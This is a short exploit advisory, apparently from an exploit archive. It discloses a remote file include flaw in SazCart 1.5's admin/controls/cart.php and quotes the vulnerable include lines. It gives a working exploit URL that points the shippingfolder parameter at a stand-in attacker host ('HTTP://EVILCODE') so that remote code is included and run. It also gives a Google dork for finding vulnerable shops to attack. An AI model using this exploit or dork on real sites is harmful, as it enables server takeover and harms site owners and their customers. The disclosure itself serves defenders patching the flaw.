id: 1115
date: 11/04/2006
title: SazCart <= 1.5 (cart.php) Remote File Include Vulnerability
author: IbnuSina
cves: 

===========================================================
SazCart <= 1.5 (cart.php) Remote File Include Vulnerability
===========================================================



sazcart v1.5 (cart.php) Remote File include
*********************---Hitamputih crew---******************************** 
* Bug Found By : IbnuSina
* vendor : http://sazcart.com/site
*Risk    : High
* Greetz : *Solpot,permenhack,barbarosa,cah|gemblunkz,fung_men,setiawan,irvian,meteoroid
***************************************************************************
bug found on admin/controls/cart.php
include($_saz['settings']['shippingfolder'] . "/shipping.php");
$Shipping = new Shipping;
include($_saz['settings']['taxfolder'] . "/tax.php");
$Tax = new Tax;

exploit :
http://sitename.com/[sazcart PATH]/admin/controls/cart.php?_saz[settings][shippingfolder]=HTTP://EVILCODE?
google dork: "powered by sazcart"



#  0day.today [2023-03-22]  #